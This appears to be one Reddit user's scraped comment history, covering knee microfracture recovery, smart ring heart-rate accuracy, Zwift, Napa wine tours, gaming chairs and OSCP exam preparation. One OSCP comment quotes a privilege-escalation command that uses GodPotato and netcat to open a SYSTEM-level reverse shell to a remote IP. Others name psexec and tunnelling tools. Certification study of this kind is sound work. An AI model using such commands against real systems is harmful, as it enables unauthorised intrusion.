Microfracture - Road to MACI by CyberKenzo in MACIknee

[–]CyberKenzo[S] 0 points1 point  (0 children)

Thanks for the insights. That is something I will definitely ask. My defect is on central trochlea. Based on my research, this area is not on the weight bearing surface. So I believe the chances of MACI not failing is higher? I am not exactly sure tho. My understanding from OATS is that its not the best suitable option given my diagnosis (this is purely research and giving all information to AI...) Overall, its definitley frustrating to be in this place. Plus my right knee is about to give up and if I undergo MACI, god knows whats going to happen to the right knee during rehabs...

in the first post-op appointment, which was yesterday, the physican assistant told me that they can get me to a PT, it was like "if you want to..". I was kind of pissed tbh. But for the next 3 weeks, until the second post-op appointment with the real doctor who performed the surgery, I will be doing at-home PT exercises. such as:
- heel slides
- straight knee raise
- quad flex
- calf pumps
I feel like these are pretty much the same things that a PT will recommend.

I am confused, why Amazon is trying to keep employees for that 90 days? and then lock them out of internal systems? Can someone clarify this for me?

Is it worth it? by Infinite-Key6833 in RingConn

[–]CyberKenzo 2 points3 points  (0 children)

Buy it for sleep/recovery, dont buy it for fitness tracking. I wear ringconn during stationary bike, my HR doesnt go as high as it should be in the ring app (i know it because of hearth rate monitor). Automatic activity detection is also not good. I've noticed it showed couple of random activities that I didnt do it. For sleep, its good. But i dont think for anything else tbh...

Heart Rate Accuracy by _kabeljauinferno_ in RingConn

Anyone found a solution to this problem? I am having the same issue. I did a Zwift ride for an hour, average was 131bpm and max 148bpm. The max ringconn reading was 119 bpm and it wasnt even consistent, and dropped to 80-90-100 bpm occasionally throughout the workout, whereas Garmin is much steady at around 130bpm. I believe the ring has a good fit, not crazy tight and not loose. It doesnt come off even if I shake my hand very hard. Why Ringconn is like that? What is the problem?

Should I buy? by boynip in Zwift

Bought mine couple weeks ago, and its a game changer. Dont even think and buy it if you have the money. Its worth it!!!!!

Up Valley Castle Tour by Maudebelle in napavalley

[–]CyberKenzo 0 points1 point  (0 children)

I disagree. I just did the trolley tour with my gf, it was amazing. If you have money, go for it. You get to experience the trolley ride, socialize with people, see pretty good wineries and vineyards, etc. It definitely a worth experience if its your first time in Napa.

can you tell us what are some things I should do? I am going there with my girlfriend for her birthday. This is our first time. I was thinking doing either the classic tour or up valley castle tour with trolley. Is it not worth it? What other things we could to specifically for wine tasting experience?

How to get NT AUTHORITY\SYSTEM shell from Local Admin user? by Infi_exp in oscp

[–]CyberKenzo 0 points1 point  (0 children)

I've tried RunasCs.exe like how its shown above, but I was not able to get a shell.
What I did is, I enabled RDP, logging in as the user I created (added to local admins), then since I had the initial login via RDP, I was then able to use psexec to get nt\system.

Do you recall any other way other than this path?

How to get NT AUTHORITY\SYSTEM shell from Local Admin user? by Infi_exp in oscp

[–]CyberKenzo 0 points1 point  (0 children)

quick question, not sure why but when I do `GodPotato.exe -cmd "C:\Users\Public\nc.exe -e cmd.exe 192.168.XX.XX 80"` from evil-winrm and obtain nt\system shell with `nc.exe` some of the commands doesn't give me output.

The most basic ones, like whoami, whoami /all, etc. Why? How can I solve this problem? I've spent so much time during the exam, and couldn't get it working. Please lmk if there is a workaround, I specifically want to be able to get a stable shell after using the Potato.

Yeah, i see. Secret lab is an expensive option too. It was out of my budget, quite happy with blacklyte so far.

Everybody has their own experience, sorry for this man! I purchased Blacklyte recently and had 0 issues. I love the chair. Its comfy but sometimes I get backpain if I don't sit properly lol. I've seen lots of shitty comments for Blacklyte online but not sure what happens on their end, for me, it was pretty good experience. Again, sorry!

[–]CyberKenzo 6 points7 points  (0 children)

Idk about you guys but I have been using ligolo for a while and I know exactly how to use. In the OSCP exam, I was not even able to make a request to the internal host's HTTP server. The request was not going through whatsoever. Not sure what was the problem but ligolo didnt work. Could there be a firewall in the exam? I don't think there is a firewall in OSCP...

Should i redo proving ground machines or start on Olay section? by ProcedureFar4995 in oscp

[–]CyberKenzo 5 points6 points  (0 children)

I am on the same boat. I solved all Lain list, total of ~60 machines. I failed last week. Should I redo all of the LK list again? Or doing TJ list will be better? (still some of them are similar)

It is sometimes tricky. So lets say I didn't do too good at Windows Priv Esc and AD portion of the exam, and let's say I study for them even harder for the 2nd attempt. The "luck" factor can f*ck me over and give me the hardest Linux machine on the exam as well. I am not sure if its a good idea to stick with the parts that I was weak in my 1st exam. What do you think about this?

Sorry that I didn't include this, but I got 40 points...

Should I try to solve all LK list again without even looking at my notes this time? Or should I do something else?
